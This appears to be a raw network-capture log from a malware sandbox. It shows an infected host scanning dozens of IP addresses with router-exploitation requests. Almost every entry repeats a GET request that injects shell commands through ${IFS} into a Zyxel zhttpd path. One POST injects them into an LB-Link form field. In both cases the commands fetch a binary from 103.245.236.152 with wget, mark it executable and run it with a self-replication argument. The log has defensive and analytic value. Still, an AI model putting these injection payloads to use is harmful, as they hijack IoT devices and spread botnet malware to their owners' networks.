                                        Jan 14, 2024 16:18:46.503309965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4793192.168.2.1357730169.174.146.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503329992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4794192.168.2.1340104118.43.59.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503384113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4795192.168.2.135105431.131.4.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503427029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4796192.168.2.1358984202.62.244.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503474951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4797192.168.2.134441699.22.194.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503495932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4798192.168.2.1359662153.200.120.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503549099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4799192.168.2.135290451.157.44.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503571033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4800192.168.2.1333108212.250.128.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503609896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4801192.168.2.1347512217.209.158.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503648996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4802192.168.2.1349916183.96.235.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503680944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4803192.168.2.1354540140.224.222.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503736973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4804192.168.2.133822869.12.203.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503767967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4805192.168.2.133295872.241.65.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503835917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4806192.168.2.13465542.137.160.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503856897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4807192.168.2.134495462.39.15.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503905058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4808192.168.2.1345784112.112.50.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503954887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4809192.168.2.1343482176.39.193.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503995895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4810192.168.2.135610059.69.210.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504065037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4811192.168.2.1348960180.154.36.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504101992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4812192.168.2.1334802168.182.146.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504134893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4813192.168.2.134172043.176.131.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504173040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4814192.168.2.134074675.138.255.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504199028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4815192.168.2.1332828136.225.98.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504239082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4816192.168.2.1360688115.74.234.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504278898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4817192.168.2.133927476.150.51.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504317999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4818192.168.2.1349386217.30.165.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504348993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4819192.168.2.134190475.121.90.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504391909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4820192.168.2.134939069.227.93.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504416943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4821192.168.2.1359410199.107.167.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504442930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4822192.168.2.1353490118.151.9.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504504919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4823192.168.2.13379061.247.34.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504555941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4824192.168.2.133632641.30.143.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504590034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4825192.168.2.133379443.246.165.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504628897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4826192.168.2.134535238.209.170.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504673958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4827192.168.2.1337276164.31.180.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504719019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4828192.168.2.135851020.238.252.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504750013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4829192.168.2.135496058.146.209.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504810095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4830192.168.2.133877864.21.21.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504846096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4831192.168.2.133810436.40.97.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504950047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4832192.168.2.135534217.217.174.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.504972935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4833192.168.2.1359614163.146.33.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.505011082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4834192.168.2.135219269.180.12.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.505040884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4835192.168.2.135609020.54.217.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.505091906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4836192.168.2.1351162154.2.249.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.505115986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4837192.168.2.1340506211.85.247.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.505153894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4838192.168.2.134149254.154.236.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.505188942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4839192.168.2.1359052125.130.116.498080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.282335043 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:47.572905064 CET510INHTTP/1.1 400 Bad Request
                                        Content-Type: text/html
                                        Content-Length: 349
                                        Connection: close
                                        Date: Sun, 14 Jan 2024 15:18:46 GMT
                                        Server: WebServer
                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4840192.168.2.135097481.206.64.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.512509108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4841192.168.2.135768086.70.49.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.512538910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4842192.168.2.1333852204.78.159.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.512581110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4843192.168.2.1358820193.250.87.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.512640953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4844192.168.2.1347352181.193.136.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.512676001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4845192.168.2.1335176102.35.65.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.512720108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4846192.168.2.1354150196.173.58.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.512784004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4847192.168.2.1339628196.200.170.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.512800932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4848192.168.2.1340940159.205.231.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.512849092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


